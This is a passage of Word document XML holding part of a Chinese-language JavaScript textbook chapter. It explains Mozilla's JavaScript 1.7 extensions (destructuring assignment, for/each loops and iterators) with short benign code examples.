      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解构赋值同样可以用于数组嵌套的情况，解</w:t>
      </w:r>
      <w:r>
        <w:t>构赋值的左侧应当也是同样格式的嵌套数组直接量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let[one,[twoA,twoB]]=[1,[2,2.5],3];//one=1,twoA=2,twoB=2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解构赋值的右侧也可以是一个对象。这种情况下，解构赋值的左侧部分也应当看起来是一个对象直接量，对象中是一个名值对的列表，名值对之间用逗号分隔，列表用花括号括起来。名值对内冒号左侧是属性名称，冒号右侧是变量名称，每一个命名属性都会从右侧对象中查找对应的赋值，每个值（或者是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>）都会赋值给它所对应的变量。这种解构赋值很容易被搞混，因</w:t>
      </w:r>
      <w:r>
        <w:t>为属性名称和变量标识符通常写成一样的。在下面这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>是属性名，</w:t>
      </w:r>
      <w:r>
        <w:t>red</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blue</w:t>
      </w:r>
      <w:r>
        <w:t>是变量名，请不要搞混：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let transparent={r:0.0,g:0.0,b:0.0,a:1.0};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个用</w:t>
      </w:r>
      <w:r>
        <w:t>RGBA</w:t>
      </w:r>
      <w:r>
        <w:t>值表示的颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let{r:red,g:green,b:blue}=transparent;//red=0.0,green=0.0,blue=0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在接下来的例子中，将</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>对象的全局函数复制至新的变量中，用以简化三角函数相关的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">let </w:t>
      </w:r>
      <w:r>
        <w:t>sin=Math.sin,cos=Math.cos,tan=Math.tan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let{sin:sin,cos:cos,tan:tan}=Math;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>就像嵌套数组可以用于解构赋值一样，嵌套对象也可以用于解构赋值，实际上，两种语法可以合在一起使用，可以用来描述任意的数据结构，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个嵌套的数据结构：一个对象中包含数组，数组中又包含对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let data={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name:"destructuring assignment",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type:"extension",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>impl:[{engine:"spider</w:t>
      </w:r>
      <w:r>
        <w:t>monkey",version:1.7},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{engine:"rhino",version:1.7}]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>使用解构赋值从数据结构中提取</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let({name:feature,impl:[{engine:impl1,version:v1},{engine:impl2}]}=data){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(feature);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"destructuring assignment"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(impl1);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"spidermonkey"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(v1);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(impl2);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"rhino"</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需要注意的是，类似这种嵌套的解构赋值可能会让代码变得晦涩难懂。然而，有一种有趣的规律可以帮助你更好地阅读这些复杂的解构赋值。思考一下最普通的赋值（给一个变量赋值）。赋值结束后，可以将这个变量用在程序中的表达式里，这个变量的值就是刚赋的值。在解构赋值中，左侧的部分使用了类似数组直接量或对象直接量的语法。但需要注意，在解构赋值完成后，左侧部分看起来像数组直接量或对象直接量的代码是可以作为合法的数组和对象用在代码中其他位置的，所有必需</w:t>
      </w:r>
      <w:r>
        <w:t>的变量都已经有定义，因此可以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接将等号左侧的部分作为一个可用的数组或对象复制并粘贴到程序的其他地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="11_4_Die_Dai_"/>
      <w:r>
        <w:t>11.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　迭代</w:t>
      </w:r>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>扩展引入了一些新的迭代机制，包括</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环和</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>风格的迭代器（</w:t>
      </w:r>
      <w:r>
        <w:t>iterator</w:t>
      </w:r>
      <w:r>
        <w:t>）和生成器（</w:t>
      </w:r>
      <w:r>
        <w:t>generator</w:t>
      </w:r>
      <w:r>
        <w:t>）。下面几节会一一介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="11_4_1_for_eachXun_Huan_"/>
      <w:r>
        <w:t>11.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环是由</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>规范（</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript for XML</w:t>
      </w:r>
      <w:r>
        <w:t>）定义的一种新的循环语句。</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>是语言的扩展，它允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中直接出现</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签，</w:t>
      </w:r>
      <w:r>
        <w:t>并添加了操作</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据的语法和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器大都没有实现</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.6</w:t>
      </w:r>
      <w:r>
        <w:t>（随着</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>发布）是支持</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>的。本节只讲解</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>，并不会涉及</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象。关于</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>的剩余内容请参照</w:t>
      </w:r>
      <w:r>
        <w:t>11.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环和</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环非常类似。但</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>并不是遍历对象的属性，而是遍历属性的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let o={one:1,two:2,three:3}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(let p in </w:t>
      </w:r>
      <w:r>
        <w:t>o)console.log(p);//for/in:</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>'one','two','three'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for each(let v in o)console.log(v);//for/each:</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用数组时，</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环遍历循环的元素（而不是索引）。它通常按数值顺序枚举它们，但实际上这并不是标准化或必需的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=['one','two','three'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let p in a)console.log(p);//Prints array indexes 0,1,2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for each</w:t>
      </w:r>
      <w:r>
        <w:t>(let v in a)console.log(v);//Prints array elts'one','two','three'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环并不仅仅针对数组本身的元素进行遍历，它也会遍历数组中所有可枚举属性的值，包括由数组继承来的可枚举方法。因此，通常并不推荐</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环和数组一起使用。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>版本中是可以这样用的，因为自定义属性和方法不可能设置为可枚举的（对</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环的讨论参见</w:t>
      </w:r>
      <w:r>
        <w:t>7.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="11_4_2_Die_Dai_Qi_"/>
      <w:r>
        <w:t>11.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　迭代器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环增加了更多通用的功能。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>中的循环和</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环非常类似，它可以遍历任何可迭代的（</w:t>
      </w:r>
      <w:r>
        <w:t>iterable</w:t>
      </w:r>
      <w:r>
        <w:t>）对象。为了便于理解，我们首先给出一些定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>迭代器是一个对象，这个对象允许对它的值集合进行遍历，并保持任何必要的状态以便能够跟踪到当前遍历的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>位置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>迭代器必须包含</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，每一次调用</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>都返回集合中的下一个值。比如下面的</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回一个迭代器，这个迭代器每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>都会返回连续递增的整数。需要注意</w:t>
      </w:r>
      <w:r>
        <w:t>的是，这个函数作用域利用闭包的特性实现了计数器当前状态的保存：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回迭代器的一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function counter(start){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let nextValue=Math.round(start);//</w:t>
      </w:r>
      <w:r>
        <w:t>表示迭代器的一个私有状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{next:function(){return nextValue++;}};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回迭代器对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let serialNumberGenerator=counter(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">let </w:t>
      </w:r>
      <w:r>
        <w:t>sn1=serialNumberGenerator.next();//1000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let sn2=serialNumberGenerator.next();//1001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当迭代器用于有限的集合时，当遍历完所有的值并且没有多余的值可迭代时，再调用</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>中的全局对象的属性。它的值是一个普通的对象（它自身没有属性），只是为了终结迭代的目的而保留的一个对象。注意，实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>并不是像</w:t>
      </w:r>
      <w:r>
        <w:t>TypeEr</w:t>
      </w:r>
      <w:r>
        <w:t>ror()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的构造函数。比如，这里实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>rangeIter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法返回一个可以对某个范围的整数进行迭代的迭代器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数返回了一个迭代器，它可以迭代某个范围内的整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function rangeIter(first,last){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let nextValue=Math.ceil(first);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>next:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(nextValue</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>last)throw StopIteration;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return nextValue++;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使用这个范围迭代器实现一次糟糕的迭代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let r=rangeIter(1,5);//</w:t>
      </w:r>
      <w:r>
        <w:t>获得迭代器对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(true){//</w:t>
      </w:r>
      <w:r>
        <w:t>在循环中使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
